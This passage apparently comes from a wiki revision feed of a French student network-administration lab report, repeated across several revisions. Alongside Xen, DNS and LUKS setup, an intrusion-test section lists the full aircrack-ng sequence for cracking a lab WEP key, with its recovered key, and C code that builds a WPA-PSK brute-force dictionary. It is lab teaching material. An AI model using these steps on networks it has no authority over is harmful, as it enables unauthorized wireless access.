                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53095</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53095"/>
				<updated>2020-11-02T17:30:11Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53055</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53055"/>
				<updated>2020-11-02T15:39:25Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ntfs /dev/sda1&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53053</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53053"/>
				<updated>2020-11-02T15:37:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Intrusion sur un serveur d’application Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
